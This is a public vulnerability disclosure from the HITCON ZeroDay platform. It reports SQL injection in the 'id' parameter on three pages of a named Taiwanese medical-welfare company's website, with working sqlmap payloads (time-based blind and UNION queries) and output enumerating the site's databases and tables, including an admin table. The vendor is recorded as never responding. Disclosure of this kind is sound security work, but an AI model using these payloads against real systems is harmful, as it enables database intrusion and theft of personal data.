福乐多某网站多处SQL - HITCON ZeroDay

Vulnerability Detail Report

Vulnerability Overview

  • ZDID: ZD-2018-00418
  •  發信 Vendor: 福樂多事業股份有限公司
  • Title: 福乐多某网站多处SQL
  • Introduction: 福乐多医疗福祉事业网站多处SQL

處理狀態

目前狀態

公開
Last Update : 2018/06/07
  • 新提交
  • 已審核
  • 已通報
  • 未回報修補狀況
  • 未複測
  • 公開

處理歷程

  • 2018/04/07 20:53:36 : 新提交 (由 Cra5h 更新此狀態)
  • 2018/04/07 20:56:43 : 新提交 (由 Cra5h 更新此狀態)
  • 2018/04/08 00:10:30 : 審核完成 (由 HITCON ZeroDay 服務團隊 更新此狀態)
  • 2018/04/08 00:10:32 : 審核完成 (由 HITCON ZeroDay 服務團隊 更新此狀態)
  • 2018/04/08 00:10:32 : 審核完成 (由 HITCON ZeroDay 服務團隊 更新此狀態)
  • 2018/04/08 02:14:05 : 通報未回應 (由 HITCON ZeroDay 服務團隊 更新此狀態)
  • 2018/04/08 02:14:06 : 通報未回應 (由 HITCON ZeroDay 服務團隊 更新此狀態)
  • 2018/06/07 03:00:23 : 公開 (由 HITCON ZeroDay 平台自動更新)

詳細資料

  • ZDID:ZD-2018-00418
  • 通報者:cra5h (Cra5h)
  • 風險:高
  • 類型:資料庫注入攻擊 (SQL Injection)

參考資料

攻擊者可利用該漏洞取得後端資料庫權限及完整資料(包含大量使用者個資或敏感性資料),同時也有機會對資料進行破壞或修改。

漏洞說明: OWASP - SQL Injection
https://www.owasp.org/index.php/SQL_Injection

漏洞說明: OWASP - Top 10 - 2017 A1 - Injection
https://www.owasp.org/index.php/Top_10-2017_A1-Injection

漏洞說明: CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
https://cwe.mitre.org/data/definitions/89.html

防護方式: OWASP - SQL Injection Prevention Cheat Sheet
https://www.owasp.org/index.php/SQL_Injection_Prevention_Cheat_Sheet
(本欄位資訊由系統根據漏洞類別自動產生,做為漏洞參考資料。)

相關網址

http://www.furoto.com.tw/1.0.1.1.php?id=313
http://www.furoto.com.tw/1.0.2.1.php?id=233
http://www.furoto.com.tw/1.0.3.1.php?id=39

敘述

福乐多医疗福祉事业网站多处SQL
SQL位置:
http://www.furoto.com.tw/1.0.1.1.php?id=313
id参数未过滤导致SQL,XSS产生
[16:44:37] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable (possible DBMS: 'MySQL')
[16:44:37] [INFO] heuristic (XSS) test shows that GET parameter 'id' might be vulnerable to cross-site scripting (XSS) attacks

SQLmap结果:
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection point(s) with a total of 81 HTTP(s) requests:

Parameter: id (GET)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: id=313 AND SLEEP(5)

Type: UNION query
Title: Generic UNION query (NULL) - 20 columns
Payload: id=-9561 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x716a6b7871,0x7a514379564c717a6864624f6b644d575166754e57657858417061594f4259684c6f416e53784b48,0x716b766271),NULL,NULL,NULL,NULL,NULL,NULL,NULL-- mgFa

[16:46:16] [INFO] the back-end DBMS is MySQL
web application technology: Apache
back-end DBMS: MySQL >= 5.0.12
[16:46:16] [INFO] fetched data logged to text files under 'C:\Users\Administrator.sqlmap\output\www.furoto.com.tw'

确认影响库:(3个)
available databases [3]:
[] furoto
[] information_schema
[*] test

[16:53:38] [INFO] fetched data logged to text files under 'C:\Users\Administrator.sqlmap\output\www.furoto.com.tw'

查看数据量:(说实话我是拒绝的,因为很慢)
Database: information_schema
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| COLUMNS | 269 |
| COLLATION_CHARACTER_SET_APPLICABILITY | 126 |
| COLLATIONS | 126 |
| CHARACTER_SETS | 36 |
| TABLES | 24 |
| SCHEMA_PRIVILEGES | 16 |
| KEY_COLUMN_USAGE | 7 |
| STATISTICS | 7 |
| TABLE_CONSTRAINTS | 7 |
| SCHEMATA | 3 |
| USER_PRIVILEGES | 1 |
+---------------------------------------+---------+

Database: furoto
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| oj_adminlog | 455 |
| oj_speech | 269 |
| oj_class | 210 |
| oj_media | 29 |
| oj_webset | 12 |
| oj_admin | 3 |
+---------------------------------------+---------+

[17:31:06] [INFO] fetched data logged to text files under 'C:\Users\Administrator.sqlmap\output\www.furoto.com.tw'

第二处:
http://www.furoto.com.tw/1.0.2.1.php?id=233
第三处:
http://www.furoto.com.tw/1.0.3.1.php?id=39

修補建議

过滤,参数化

擷圖

留言討論

聯絡組織

 發送私人訊息
您也可以透過私人訊息的方式與組織聯繫,討論有關於這個漏洞的相關資訊。
;